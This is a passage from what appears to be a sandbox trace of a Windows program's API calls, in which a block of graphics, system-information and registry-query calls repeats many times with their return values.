dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.502] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.502] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.502] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.502] BeginPath (hdc=0x0) returned 0 [0089.502] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.502] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.502] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.502] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.502] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.502] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.502] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.502] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.502] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xae0401d9 [0089.502] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xac0401dc [0089.502] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045699 [0089.502] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104569a [0089.502] CombineRgn (hrgnDst=0x1045699, hrgnSrc1=0xae0401d9, hrgnSrc2=0xac0401dc, iMode=1) returned 1 [0089.502] CombineRgn (hrgnDst=0x104569a, hrgnSrc1=0xae0401d9, hrgnSrc2=0xac0401dc, iMode=4) returned 2 [0089.502] CreateSolidBrush (color=0xff) returned 0x2105698 [0089.502] CreateSolidBrush (color=0xff0000) returned 0x110569b [0089.502] DeleteObject (ho=0x110569b) returned 1 [0089.502] DeleteObject (ho=0xac0401dc) returned 1 [0089.502] DeleteObject (ho=0xae0401d9) returned 1 [0089.502] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.502] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.502] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.502] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.502] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.502] BeginPath (hdc=0x0) returned 0 [0089.502] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.502] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.502] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.502] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.502] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.502] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.502] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.502] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.503] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xad0401dc [0089.503] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xaf0401d9 [0089.503] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104569c [0089.503] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104569d [0089.503] CombineRgn (hrgnDst=0x104569c, hrgnSrc1=0xad0401dc, hrgnSrc2=0xaf0401d9, iMode=1) returned 1 [0089.503] CombineRgn (hrgnDst=0x104569d, hrgnSrc1=0xad0401dc, hrgnSrc2=0xaf0401d9, iMode=4) returned 2 [0089.503] CreateSolidBrush (color=0xff) returned 0x210569b [0089.503] CreateSolidBrush (color=0xff0000) returned 0x110569e [0089.503] DeleteObject (ho=0x110569e) returned 1 [0089.503] DeleteObject (ho=0xaf0401d9) returned 1 [0089.503] DeleteObject (ho=0xad0401dc) returned 1 [0089.503] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.503] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.503] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.503] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.503] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.503] BeginPath (hdc=0x0) returned 0 [0089.503] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.503] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.503] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.503] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.503] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.503] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.503] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.503] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.637] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb00401d9 [0089.637] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xae0401dc [0089.637] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104569f [0089.637] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10456a0 [0089.637] CombineRgn (hrgnDst=0x104569f, hrgnSrc1=0xb00401d9, hrgnSrc2=0xae0401dc, iMode=1) returned 1 [0089.637] CombineRgn (hrgnDst=0x10456a0, hrgnSrc1=0xb00401d9, hrgnSrc2=0xae0401dc, iMode=4) returned 2 [0089.637] CreateSolidBrush (color=0xff) returned 0x210569e [0089.637] CreateSolidBrush (color=0xff0000) returned 0x11056a1 [0089.637] DeleteObject (ho=0x11056a1) returned 1 [0089.637] DeleteObject (ho=0xae0401dc) returned 1 [0089.637] DeleteObject (ho=0xb00401d9) returned 1 [0089.637] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.637] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.637] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.637] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.637] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.637] BeginPath (hdc=0x0) returned 0 [0089.637] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.637] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.638] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.638] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.638] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.638] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.638] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.638] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.638] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xaf0401dc [0089.638] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb10401d9 [0089.638] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10456a2 [0089.638] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10456a3 [0089.638] CombineRgn (hrgnDst=0x10456a2, hrgnSrc1=0xaf0401dc, hrgnSrc2=0xb10401d9, iMode=1) returned 1 [0089.638] CombineRgn (hrgnDst=0x10456a3, hrgnSrc1=0xaf0401dc, hrgnSrc2=0xb10401d9, iMode=4) returned 2 [0089.638] CreateSolidBrush (color=0xff) returned 0x21056a1 [0089.638] CreateSolidBrush (color=0xff0000) returned 0x11056a4 [0089.638] DeleteObject (ho=0x11056a4) returned 1 [0089.638] DeleteObject (ho=0xb10401d9) returned 1 [0089.638] DeleteObject (ho=0xaf0401dc) returned 1 [0089.638] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.638] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.638] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.638] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.638] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.638] BeginPath (hdc=0x0) returned 0 [0089.638] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.638] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.638] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.638] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.639] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.639] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.639] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.639] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.639] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb20401d9 [0089.639] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb00401dc [0089.639] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10456a5 [0089.639] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10456a6 [0089.639] CombineRgn (hrgnDst=0x10456a5, hrgnSrc1=0xb20401d9, hrgnSrc2=0xb00401dc, iMode=1) returned 1 [0089.639] CombineRgn (hrgnDst=0x10456a6, hrgnSrc1=0xb20401d9, hrgnSrc2=0xb00401dc, iMode=4) returned 2 [0089.639] CreateSolidBrush (color=0xff) returned 0x21056a4 [0089.639] CreateSolidBrush (color=0xff0000) returned 0x11056a7 [0089.639] DeleteObject (ho=0x11056a7) returned 1 [0089.639] DeleteObject (ho=0xb00401dc) returned 1 [0089.639] DeleteObject (ho=0xb20401d9) returned 1 [0089.639] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.639] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.639] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.639] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.639] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.639] BeginPath (hdc=0x0) returned 0 [0089.639] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.639] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.639] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.639] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.639] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.639] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.640] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.640] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.640] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb10401dc [0089.640] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb30401d9 [0089.640] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10456a8 [0089.640] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10456a9 [0089.640] CombineRgn (hrgnDst=0x10456a8, hrgnSrc1=0xb10401dc, hrgnSrc2=0xb30401d9, iMode=1) returned 1 [0089.640] CombineRgn (hrgnDst=0x10456a9, hrgnSrc1=0xb10401dc, hrgnSrc2=0xb30401d9, iMode=4) returned 2 [0089.640] CreateSolidBrush (color=0xff) returned 0x21056a7 [0089.640] CreateSolidBrush (color=0xff0000) returned 0x11056aa [0089.640] DeleteObject (ho=0x11056aa) returned 1 [0089.640] DeleteObject (ho=0xb30401d9) returned 1 [0089.640] DeleteObject (ho=0xb10401dc) returned 1 [0089.640] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.640] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.640] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.640] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.640] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.640] BeginPath (hdc=0x0) returned 0 [0089.640] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.640] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.640] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.640] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.640] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.640] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.640] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.641] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.641] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb40401d9 [0089.641] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb20401dc [0089.641] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10456ab [0089.641] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10456ac [0089.641] CombineRgn (hrgnDst=0x10456ab, hrgnSrc1=0xb40401d9, hrgnSrc2=0xb20401dc, iMode=1) returned 1 [0089.641] CombineRgn (hrgnDst=0x10456ac, hrgnSrc1=0xb40401d9, hrgnSrc2=0xb20401dc, iMode=4) returned 2 [0089.641] CreateSolidBrush (color=0xff) returned 0x21056aa [0089.641] CreateSolidBrush (color=0xff0000) returned 0x11056ad [0089.641] DeleteObject (ho=0x11056ad) returned 1 [0089.641] DeleteObject (ho=0xb20401dc) returned 1 [0089.641] DeleteObject (ho=0xb40401d9) returned 1 [0089.641] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.641] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.641] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.641] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.641] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.641] BeginPath (hdc=0x0) returned 0 [0089.641] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.641] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.641] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.641] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.641] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.641] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.641] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.641] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.642] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb30401dc [0089.642] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb50401d9 [0089.642] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10456ae [0089.642] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10456af [0089.642] CombineRgn (hrgnDst=0x10456ae, hrgnSrc1=0xb30401dc, hrgnSrc2=0xb50401d9, iMode=1) returned 1 [0089.642] CombineRgn (hrgnDst=0x10456af, hrgnSrc1=0xb30401dc, hrgnSrc2=0xb50401d9, iMode=4) returned 2 [0089.642] CreateSolidBrush (color=0xff) returned 0x21056ad [0089.642] CreateSolidBrush (color=0xff0000) returned 0x11056b0 [0089.642] DeleteObject (ho=0x11056b0) returned 1 [0089.642] DeleteObject (ho=0xb50401d9) returned 1 [0089.642] DeleteObject (ho=0xb30401dc) returned 1 [0089.642] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.642] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.642] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.642] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.642] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.642] BeginPath (hdc=0x0) returned 0 [0089.642] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.642] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.642] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.642] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.642] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.642] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.642] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.642] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.643] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb60401d9 [0089.643] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb40401dc [0089.643] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10456b1 [0089.643] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10456b2 [0089.643] CombineRgn (hrgnDst=0x10456b1, hrgnSrc1=0xb60401d9, hrgnSrc2=0xb40401dc, iMode=1) returned 1 [0089.643] CombineRgn (hrgnDst=0x10456b2, hrgnSrc1=0xb60401d9, hrgnSrc2=0xb40401dc, iMode=4) returned 2 [0089.643] CreateSolidBrush (color=0xff) returned 0x21056b0 [0089.643] CreateSolidBrush (color=0xff0000) returned 0x11056b3 [0089.643] DeleteObject (ho=0x11056b3) returned 1 [0089.643] DeleteObject (ho=0xb40401dc) returned 1 [0089.643] DeleteObject (ho=0xb60401d9) returned 1 [0089.643] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.643] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.643] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.643] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.643] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.643] BeginPath (hdc=0x0) returned 0 [0089.643] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.643] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.643] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.643] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.643] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.643] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.643] RtlUnwind (TargetFrame=0x181840, 